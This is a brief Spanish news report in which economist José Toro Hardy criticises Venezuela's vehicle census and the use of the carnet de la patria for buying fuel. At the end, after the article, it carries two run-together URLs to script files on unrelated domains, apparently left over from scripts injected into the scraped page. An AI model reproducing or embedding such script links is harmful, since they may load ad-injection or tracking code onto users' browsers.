El economista indicó que los únicos documentos legales en el país son la cédula de identidad, el pasaporte y la partida de nacimiento.

José Toro Hardy, ex director de Petróleos de Venezuela S.A (Pdvsa), criticó este martes la decisión de realizar un censo del parque automotor en el país.

El economista explicó que esta medida no es necesaria debido a los múltiples mecanismos que permiten la identificación de los conductores en Venezuela, tales como el carnet de circulación, reseñó Globovisión.

Hardy también expresó su preocupación acerca del empleo del carnet de la patria como requisito para adquirir combustible en algunas zonas del país, pues lo cataloga como una “discriminación”.

El experto agregó además que el carnet de la patria no puede ser utilizado como un documento de identificación, debido a que los únicos documentos de uso legal en el país son: la cédula de identidad, el pasaporte y la partida de nacimiento.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533075132828https://devlinkin.xyz/addons/lnkr5.min.js

Loading...